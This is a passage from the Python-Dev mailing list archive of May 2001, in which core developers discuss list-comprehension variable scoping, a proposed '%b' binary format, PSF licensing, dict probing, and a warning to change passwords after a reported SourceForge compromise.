[x**2 for x in range(2000)] print x I think it should map to something like this from C++: int x = 42; int L[2000]; for (int x = 0; x < 2000; ++x) { L[x] = x * x; } printf("%d\n", x); i.e., both *should* print "42\n" on standard output. Tim sez: > I'm not sure it's worth losing the exact correspondence with nested loops; > or that it's not worth it either. Note that "the iterator variables" > needn't be bare names: > > >>> class x: > ... pass > ... > >>> [1 for x.i in range(3)] > [1, 1, 1] > >>> x.i > 2 David: > Hmmm. I didn't realize that you could even do this. Yes, this would > definitely present a problem. However, if list comprehensions were I didn't realize this either. I'm quite surprised by it, in fact, though I understand (I think) why it works that way. But was this intentional? It seems like pure evil to me! I'd only expect it to support bare names and sequence unpacking (with only bare names at the "edge" of all nested unpackings). -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From gward at python.net Wed May 30 16:36:30 2001 From: gward at python.net (Greg Ward) Date: Wed, 30 May 2001 10:36:30 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Wed, May 30, 2001 at 08:49:29AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: <20010530103630.B11580@gerg.ca> On 30 May 2001, David Beazley said: > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. For the record, I have not been bitten by this, but I probably don't use list comps as much as you do. I can completely sympathize with both your and Tim's point of view here. Both make perfect sense at the same time. Hmmm. "Do I contradict myself? Very well then I contradict myself, (I am large, I contain multitudes)" Greg -- Greg Ward - Unix nerd gward at python.net http://starship.python.net/~gward/ Money is a powerful aphrodisiac. But flowers work almost as well. From barry at digicool.com Wed May 30 17:07:12 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 11:07:12 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading References: <20010530131424.Y690@xs4all.nl> <20010530122702.F3FE53B8999@snelboot.oratrix.nl> Message-ID: <15125.3232.925401.563151@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> The easiest solution would of course be for Itamar to get his TW> boss/lawyers to give us the right to relicence it under the TW> PSF licence :) >>>>> "JJ" == Jack Jansen writes: JJ> I think this is the only viable solution. If various parts of JJ> Python have different license agreements this may well be a JJ> reason for people not to use Python because the hassle of JJ> figuring out which pieces fit their own licensing policy. I completely agree. IMO, the most important job of the PSF is to make the Python IP sane again. That means clearing as much of the existing rights as possible, and releasing it under the NAIPL (New And Improved Python License). Any code that is licensed differently could mean that it'll be ripped out of some re-distributions. I'd be less concerned about some ancillary module that few people use, and much more concerned about some core piece of the code. -Barry From mal at lemburg.com Wed May 30 21:57:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 21:57:17 +0200 Subject: [Python-Dev] Autoconf problems on BeOS Message-ID: <3B15509D.C790D5DF@lemburg.com> I have a bug report assigned to myself which really is more about autoconf than Unicode. The problem is that the SIZEOF_xxx tests cause the Metroworks compiler on BeOS to fail and this again causes these defines to be set to 0 ! Could someone with more autoconf experience please have a look ? https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470 Thanks, -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one at home.com Wed May 30 22:07:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:07:37 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com> Message-ID: [Tim] > Note that "the iterator variables" needn't be bare names: [Fred] > I didn't realize this either. You have to get your head out of the docs and read more code . > I'm quite surprised by it, in fact, though I understand (I think) why > it works that way. But was this intentional? I expect so. > It seems like pure evil to me! Sometimes it's the bee's knees; for example, >>> digits = range(3) >>> x = [None] * 3 >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits] >>> base3 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0], [0, 1, 1], [0, 1, 2], [0, 2, 0], [0, 2, 1], [0, 2, 2], [1, 0, 0], [1, 0, 1], [1, 0, 2], [1, 1, 0], [1, 1, 1], [1, 1, 2], [1, 2, 0], [1, 2, 1], [1, 2, 2], [2, 0, 0], [2, 0, 1], [2, 0, 2], [2, 1, 0], [2, 1, 1], [2, 1, 2], [2, 2, 0], [2, 2, 1], [2, 2, 2]] >>> I've done stuff "like that" often, albeit via the nested-loop spelling. > I'd only expect it to support bare names and sequence unpacking (with > only bare names at the "edge" of all nested unpackings). It's too late to take it away now! Python always worked this way. And it's really got nothing to do with what implementing what David wants (e.g., the lambda transformation I mentioned preserves its semantics) -- apart from (I hope) driving home that changes need to be considered very carefully. From tim.one at home.com Wed May 30 22:22:19 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 16:22:19 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley, pretty much repeats why he doesn't like the current scheme] I hoped it was clear the first time I was at least half sympathetic! If it wasn't, I am . >> >>> i = 12 >> >>> (lambda: [i**2 for i in range(4)])() >> [0, 1, 4, 9] >> >>> i >> 12 >> >>> >> >> That's more like Haskell does it. > Ah yes, well this is exactly the kind of behavior that seems most > natural to me. It's also the behavior that everyone expected went I > went around to the various Python hackers in the department and asked > them about it yesterday. I believe that. > I suppose I could just write this: > > a = (lambda s: [2*i for i in s])(s) > > However, that's pretty ugly. It's too complicated, isn't it? In the presence of nested scopes (which are reality in 2.2), a = (lambda: [2*i for i in s])() does the same thing and is conceptually clearer. I'm not suggesting that you actually write that, but view it as a *model* for your intended semantics. I wouldn't want to see the implementation actually use a lambda under the covers, either, but we need some crisp way to explain the intent. Note that the lambda-trick *model* "does the right thing" for for-loop targets like x.i and x[i] too. > In any case, I'm mostly just curious if anyone else has been bitten by > the problem I've described. I would certainly love to see a fix for > it (I would even volunteer to work on a prototype implementation if > there is interest). I encourage that, but since it's not 100% backward-compatible you'll enjoy the usual range of hysterical opposition. Needs a PEP, and possibly even an associated future-statement. Overall, I'm more in favor of changing it than not. From skip at pobox.com Wed May 30 22:48:47 2001 From: skip at pobox.com (Skip Montanaro) Date: Wed, 30 May 2001 15:48:47 -0500 Subject: [Python-Dev] scoping and list comprehensions Message-ID: <15125.23727.168431.762320@beluga.mojam.com> Regarding the issue of how list comprehensions should relate to their environment, perhaps instead of modifying list comprehensions to make them execute in new local scopes (or at least appear to) a better solution would be to allow a new local scope to be introduced inline, sort of like in C: { int i; for (i=0; i < 10; i++) { dostuffwith(i); } } While this might be used more for list comprehensions than other constructs, I'm sure people will find a way to (ab)use it for other things as well. I don't see an obvious way of adding such functionality to Python without introducing a new keyword though, which is going to make it difficult to get past Guido: l = [] scope: l = [i**2 for i in range(10)] print l Hmmm, wait a minute, what if you terminated a block introducer (if or while clause or try/except clauses) with something other than a colon? (I'm just thinking out loud, I don't think this is necessarily a good solution). if 1: # no new scope introduced l = [i**2 for i in range(10)] print l vs. if 1; # new scope introduced for enclosed block l = [i**2 for i in range(10)] print l That certainly has some line noise qualities about it, especially since colons and semicolons are visually so similar, but does offer an alternative to introducing a new keyword into the language. Hmmm, wait another minute, perhaps you could simply overload def: l = [] def: l = [i**2 for i in range(10)] print l There's also the problem of how to export results from the scope, though perhaps the new nested scope stuff provides a solution to that. (I've ignored them so far, so I can't tell...) Would it be possible for the compiler to recognize the degenerate def: and simply mangle any names that would clash instead of introducing an actual new execution frame? The above might be equivalent to l = [] l = [__mangled_i**2 for __mangled_i in range(10)] print l if 'i' already existed in the same scope. Just thinking out loud. I'm not sure any of these ideas is any better than the current state of affairs. Skip From Greg.Wilson at baltimore.com Wed May 30 23:11:16 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 30 May 2001 17:11:16 -0400 Subject: [Python-Dev] %b format? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> I would like to add a "%b" format for converting numbers to binary format (1's and 0's). I realize this isn't a C-ism, but it would be very useful for teaching purposes, as newcomers find 101101 a lot easier to understand than 0x2D. Reactions? Greg ----------------------------------------------------------------------------------------------------------------- The information contained in this message is confidential and is intended for the addressee(s) only. If you have received this message in error or there are any problems please notify the originator immediately. The unauthorized use, disclosure, copying or alteration of this message is strictly forbidden. Baltimore Technologies plc will not be liable for direct, special, indirect or consequential damages arising from alteration of the contents of this message by a third party or as a result of any virus being passed on. In addition, certain Marketing collateral may be added from time to time to promote Baltimore Technologies products, services, Global e-Security or appearance at trade shows and conferences. This footnote confirms that this email message has been swept by Baltimore MIMEsweeper for Content Security threats, including computer viruses. From esr at thyrsus.com Wed May 30 23:28:38 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:28:38 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <20010530172838.A778@thyrsus.com> Greg Wilson : > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). I realize > this isn't a C-ism, but it would be very useful for > teaching purposes, as newcomers find 101101 a lot > easier to understand than 0x2D. > > Reactions? +1. Didactically pretty useful, and the additional code won't boost global complexity much. -- Eric S. Raymond Where rights secured by the Constitution are involved, there can be no rule making or legislation which would abrogate them. -- Miranda vs. Arizona, 384 US 436 p. 491 From tim.one at home.com Wed May 30 23:30:49 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:30:49 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: <20010530131424.Y690@xs4all.nl> Message-ID: [Thomas Wouters] > This raises an interesting point. Do we want separate pieces of the > Python distribution to have separate licences ? This is a question for the PSF to resolve, since the PSF is intended to become the sole legal owner of Python's IP rights. My position will be that nothing ships in the distribution unless copyright has been assigned to the PSF, or the contributor has agreed to give the PSF a non-exclusive irrevocable etc license to release their work under the PSF license du jour. Fleshing out the second option so as to prevent abuse on either side is going to require significant effort ("what if the PSF goes away?", "what if the PSF changes its license to something I hate?", "what if I change my mind?", etc). Unfortunately, significant effort takes significant time too, and nobody has started on this yet. From mal at lemburg.com Wed May 30 23:31:06 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 30 May 2001 23:31:06 +0200 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> Message-ID: <3B15669A.43B70A44@lemburg.com> "Eric S. Raymond" wrote: > > Greg Wilson : > > I would like to add a "%b" format for converting > > numbers to binary format (1's and 0's). I realize > > this isn't a C-ism, but it would be very useful for > > teaching purposes, as newcomers find 101101 a lot > > easier to understand than 0x2D. > > > > Reactions? > > +1. Didactically pretty useful, and the additional code won't boost > global complexity much. Good idea. The only question I have is: in which order will you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I am thinking of adding a bit field type to mxNumber and have the same problem there... -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From esr at thyrsus.com Wed May 30 23:42:22 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:42:22 -0400 Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400 References: <20010530131424.Y690@xs4all.nl> Message-ID: <20010530174222.A1019@thyrsus.com> Tim Peters : > My position will be that nothing ships in the distribution unless copyright > has been assigned to the PSF, or the contributor has agreed to give the PSF > a non-exclusive irrevocable etc license to release their work under the PSF > license du jour. Fleshing out the second option so as to prevent abuse on > either side is going to require significant effort ("what if the PSF goes > away?", "what if the PSF changes its license to something I hate?", "what if > I change my mind?", etc). > > Unfortunately, significant effort takes significant time too, and nobody has > started on this yet. I think a PSF pleadge to use only an OSI-certified license would address some of these issues. Write it into the bylaws if necessary. -- Eric S. Raymond He that would make his own liberty secure must guard even his enemy from oppression: for if he violates this duty, he establishes a precedent that will reach unto himself. -- Thomas Paine From esr at thyrsus.com Wed May 30 23:44:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 17:44:57 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530174457.B1019@thyrsus.com> M.-A. Lemburg : > > > I would like to add a "%b" format for converting > > > numbers to binary format (1's and 0's). I realize > > > this isn't a C-ism, but it would be very useful for > > > teaching purposes, as newcomers find 101101 a lot > > > easier to understand than 0x2D. > > > > +1. Didactically pretty useful, and the additional code won't boost > > global complexity much. > > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? > > I am thinking of adding a bit field type to mxNumber and have > the same problem there... For *this* context, we clearly want mathematical notation; MSB to the right and no byte-swapping. After all we'd actually be printing numerals, not dumping a bitfield. -- Eric S. Raymond The people of the various provinces are strictly forbidden to have in their possession any swords, short swords, bows, spears, firearms, or other types of arms. The possession of unnecessary implements makes difficult the collection of taxes and dues and tends to foment uprisings. -- Toyotomi Hideyoshi, dictator of Japan, August 1588 From barry at digicool.com Wed May 30 23:49:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 17:49:22 -0400 Subject: [Python-Dev] %b format? References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> Message-ID: <15125.27362.431144.886216@anthem.wooz.org> >>>>> "GW" == Greg Wilson writes: GW> I would like to add a "%b" format for converting numbers to GW> binary format (1's and 0's). For completeness, wouldn't you also want a binary integer literal so your students could write binary numbers in their code? And what about a binary() operator a la hex()? -Barry From tim.one at home.com Wed May 30 23:50:31 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 17:50:31 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <3B15669A.43B70A44@lemburg.com> Message-ID: [Greg Wilson] > I would like to add a "%b" format for converting > numbers to binary format (1's and 0's). -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to %o is to __oct__ as nothing is to %b is to nothing. In that respect it's unfortunate that Python has distinct nb_oct and nb_hex slots in the PyNumberMethods struct (as opposed to a single parameterized "convert to base N string" method). [MAL] > Good idea. The only question I have is: in which order will > you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ? I'm sure Greg has in mind only integers, in which case %x and %o already give the only useful answer. From fdrake at cj42289-a.reston1.va.home.com Wed May 30 23:51:22 2001 From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 17:51:22 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Update for development version of Python (2.2). This update substantially re-works the prototype support for productions of a formal grammar. They look better, support forward references to symbol definitions, and allow download of an all-text version of the complete grammar (with productions ordered the same way as they are in the documentation sources). "Documeting Python" now includes documentation for the LaTeX markup used to describe productions: http://python.sourceforge.net/devel-docs/doc/grammar-displays.html From esr at thyrsus.com Thu May 31 00:05:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:05:09 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400 References: <3B15669A.43B70A44@lemburg.com> Message-ID: <20010530180509.B1305@thyrsus.com> Tim Peters : > -0, due to compound lumpiness: hex() is to %x is to __hex__ as oct() is to > %o is to __oct__ as nothing is to %b is to nothing. In that respect it's > unfortunate that Python has distinct nb_oct and nb_hex slots in the > PyNumberMethods struct (as opposed to a single parameterized "convert to > base N string" method). Is the right answer to add the convert-to-base slot and deprecate the other two? -- Eric S. Raymond If gun laws in fact worked, the sponsors of this type of legislation should have no difficulty drawing upon long lists of examples of criminal acts reduced by such legislation. That they cannot do so after a century and a half of trying -- that they must sweep under the rug the southern attempts at gun control in the 1870-1910 period, the northeastern attempts in the 1920-1939 period, the attempts at both Federal and State levels in 1965-1976 -- establishes the repeated, complete and inevitable failure of gun laws to control serious crime. -- Senator Orrin Hatch, in a 1982 Senate Report From fdrake at acm.org Thu May 31 00:00:15 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 18:00:15 -0400 (EDT) Subject: [Python-Dev] Most recent documentation update Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> One thing I forgot to mention in my announcement of the update to the development documnetation which I just posted is that I went ahead and converted all but one of the productions in the Reference Manual to the new markup. The print_stmt production, unfortunately, is given twice instead of using a single model for the statement. The formatting tools don't support that (yet), and it's not clear that they should. (No, Barry, don't go changing it...!) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From esr at thyrsus.com Thu May 31 00:03:41 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:03:41 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530180341.A1305@thyrsus.com> Barry A. Warsaw : > > >>>>> "GW" == Greg Wilson writes: > > GW> I would like to add a "%b" format for converting numbers to > GW> binary format (1's and 0's). > > For completeness, wouldn't you also want a binary integer literal so > your students could write binary numbers in their code? And what > about a binary() operator a la hex()? Barry is correct. If we're going to do this, we ought to do it right and support binary on a par with decimal, hex, and octal. I favor this. -- Eric S. Raymond The direct use of physical force is so poor a solution to the problem of limited resources that it is commonly employed only by small children and great nations. -- David Friedman From barry at digicool.com Thu May 31 00:05:37 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 30 May 2001 18:05:37 -0400 Subject: [Python-Dev] Most recent documentation update References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com> Message-ID: <15125.28337.938136.505675@anthem.wooz.org> >>>>> "Fred" == Fred L Drake, Jr writes: Fred> (No, Barry, don't go changing it...!) Oh darn, three whole days work wasted... :) From tim.one at home.com Thu May 31 00:17:42 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:17:42 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: Note that in Vyper (John Skaller's Python variant) these are legit integer literals: 0b11111111 0B11111111 0o777 0O777 0d999 0D999 0xfFf 0XFFf Vyper's octal notation is still ugly, but whoever first thought 0777 != 777 was a "good idea" was certifiably insane <0.25 wink>. From tim.one at home.com Thu May 31 00:29:33 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 18:29:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530180509.B1305@thyrsus.com> Message-ID: [Eric S. Raymond] > Is the right answer to add the convert-to-base slot and deprecate the > other two? That would fix "the other" lump here in Python, that e.g. >>> int("111", 3) 13 >>> has no inverse. string->int is happy with any base in 2..36 inclusive, but int->string is spelled via 3 different builtins covering only 3 of those bases. It would be more *expedient* to add "just" a __bin__/nb_bin method + a way to spell binary int literals + a %b format + a bin() builtin. On the fifth hand, I doubt anyone would want to add new % format codes for bases {2..36} - {2, 8, 10, 16}. So it will remain lumpy no matter what. I look forward to the PEP . From esr at thyrsus.com Thu May 31 00:38:33 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:38:33 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530183833.B1654@thyrsus.com> Tim Peters : > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. For anyone who doesn't know the history behind this... The 0xxx notation was copied from PDP-11 assembler literals -- the instruction-set design of the PDP-11 was such that most of the instruction subfields fit in octal digits, so this convention made it somewhat easier to read machine-code dumps. While I'm at it, I should note that the design of the 11 was ancestral to both the 8088 and 68000 microprocessors, and thus to essentially every new general-purpose computer designed in the last fifteen years. -- Eric S. Raymond "Are we to understand," asked the judge, "that you hold your own interests above the interests of the public?" "I hold that such a question can never arise except in a society of cannibals." -- Ayn Rand From esr at thyrsus.com Thu May 31 00:39:43 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 30 May 2001 18:39:43 -0400 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400 References: <20010530180509.B1305@thyrsus.com> Message-ID: <20010530183943.C1654@thyrsus.com> Tim Peters : > [Eric S. Raymond] > > Is the right answer to add the convert-to-base slot and deprecate the > > other two? > > That would fix "the other" lump here in Python, that e.g. > > >>> int("111", 3) > 13 > >>> > > has no inverse. string->int is happy with any base in 2..36 inclusive, but > int->string is spelled via 3 different builtins covering only 3 of those > bases. That sounds like a strong argument to me. -- Eric S. Raymond The world is filled with violence. Because criminals carry guns, we decent law-abiding citizens should also have guns. Otherwise they will win and the decent people will lose. -- James Earl Jones From nas at python.ca Thu May 31 00:38:58 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 30 May 2001 15:38:58 -0700 Subject: [Python-Dev] %b format? In-Reply-To: ; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400 References: <15125.27362.431144.886216@anthem.wooz.org> Message-ID: <20010530153858.A21901@glacier.fnational.com> Tim Peters wrote: > Vyper's octal notation is still ugly, but whoever first thought > > 0777 != 777 > > was a "good idea" was certifiably insane <0.25 wink>. Ever used MacLisp or ZetaLisp? There: 777 == 0d511 If only we had been born with 8 or 16 fingers, right? Neil From thomas at xs4all.net Thu May 31 03:52:48 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 31 May 2001 03:52:48 +0200 Subject: [Python-Dev] SF hacked Message-ID: <20010531035248.G690@xs4all.nl> It *seems*, from this site: http://66.92.75.28/~vladimir/themes-org.html that SourceForge has been hacked, and more seriously than SF first admits (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :) And the same goes for apache.org, it looks like. Anyway, if anyone connected *from* any of sourceforge's machines to anywhere else, in the last couple of months, they'll be well advised to change their passwords and check for intruders. The same goes if you connect through ssh and (foolishly ;) allowed ssh-agent-forwarding to the SF machines. In that case, better check all the machines that ssh-agent would give you unpassworded access to for logins you don't recognize. The site above lists a number of sniffed passwords, in case you want to check, but there's no reason for the hacker not to have even more sniffed passwords lying about :) And if you have a login on apache.org, you probably want to change your password in any case.... the above listed site has what seems to be a copy of the shadow password file. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From tim.one at home.com Thu May 31 05:53:53 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 30 May 2001 23:53:53 -0400 Subject: [Python-Dev] One more dict trick Message-ID: If anyone has an app known or suspected to be sensitive to dict timing, please try the patch here. Best I've been able to tell, it's a win. But it's a radical change in approach, so I don't want to rush it. This gets rid of the polynomial machinery entirely, along with the branches associated with updating the things, and the dictobject struct member holding the table's poly. Instead it relies on that i = (5*i + 1) % n is a full-period RNG whenever n is a power of 2 (that's what guarantees it will visit every slot), but perturbs that by adding in a few bits from the full hash code shifted right each time (that's what guarantees every bit of the hash code eventually influences the probe sequence, avoiding simple quadratic-time degenerate cases). -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: dict.txt URL: From tim.one at home.com Thu May 31 06:46:56 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:46:56 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530183833.B1654@thyrsus.com> Message-ID: [ESR] > The 0xxx notation was copied from PDP-11 assembler literals -- the > instruction-set design of the PDP-11 was such that most of the > instruction subfields fit in octal digits, so this convention made it > somewhat easier to read machine-code dumps. That doesn't mean they weren't certifiably insane. At Cray, we had a much more sensible convention: *all* numbers were octal (yes, it was a 64-bit box and octal didn't make any sense, but Seymour Cray got used to it from the 60-bit CDC w/ 18-bit address registers and didn't feel like changing). My first boss there loved telling the story about he was out for a drive with the family, and excitedly screamed "Hey, kids! Look! The odometer is just about to change to 40,000!". Of course it read 37,777.9 at the time, and they thought he was nuts. That's where this kind of thing always leads in the end. to-disgrace-despair-and-eventually-ruin-ly y'rs - tim From tim.one at home.com Thu May 31 06:48:28 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 31 May 2001 00:48:28 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <20010530153858.A21901@glacier.fnational.com> Message-ID: [Neil Schemenauer] > Ever used MacLisp or ZetaLisp? There: > > 777 == 0d511 > > If only we had been born with 8 or 16 fingers, right? Then guys would probably be attracted to base 9 or 17. sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs - tim From greg at cosc.canterbury.ac.nz Thu May 31 07:15:24 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:15:24 +1200 (NZST) Subject: [Python-Dev] scoping and list comprehensions In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com> Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz> Skip: > scope: > l = [i**2 for i in range(10)] By analogy with C, the introducer of a new scope should simply be an unadorned colon: : l = [i**2 for i in range(10)] :-) While this might be useful, it doesn't really address the issue raised, because we really need a new scope per listcomp (or maybe even each 'for' in the listcomp). > There's also the problem of how to export results from the scope, though > perhaps the new nested scope stuff provides a solution to that. Nope -- there's still no way to assign to any name in an intermediate scope. Something heretical, such as declarations, would be needed. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:11 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:11 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz> Tim: > >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in > digits] Yikes! That would be clearer as [[x,y,z] for x in digits for y in digits for z in digits] I'll concede it's nowhere near as much fun, though... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:16:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:16:41 +1200 (NZST) Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz> Tim: > Needs a PEP, and possibly > even an associated future-statement. Overall, I'm more in favor of changing > it than not. If we do this, we also need to consider whether we want to make the corresponding change to regular for-loops. Seems to me that all the reasons it's a good idea for listcomps apply to for-loops as well. Another advantage of changing both together is that we can continue to describe listcomp semantics in terms of for-loops instead of lambdas. Then we won't have to go into hiding until Guido dies or lifts the fatwah against us. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Thu May 31 07:17:16 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 31 May 2001 17:17:16 +1200 (NZST) Subject: [Python-Dev] %b format? In-Reply-To: Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz> Tim: > On the fifth hand, I doubt anyone would want to add new % format codes for > bases {2..36} - {2, 8, 10, 16}. So, just add one general one: %m.nb with n being the base. If n defaults to 2, you can read the "b" as either "base" or "binary". Literals: 0b(5)21403 general 0b11001101 binary Conversion functions: base(x, n) general bin(x) equivalent to base(x, 2) (for symmetry with existing hex, oct) Type slots: __base__(x, n) Backwards compatibility measures: hex(x) --> base(x, 16) oct(x) --> base(x, 8) bin(x) --> base(x, 2) base(x, n) checks __hex__ and __oct__ slots for special cases of n=16 and n=8, falls back on __base__ There, that takes care of integers. Anyone want to do the equivalent for floats ?-) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From esr at thyrsus.com Thu May 31 08:01:54 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 02:01:54 -0400 Subject: [Python-Dev] %b format? In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200 References: 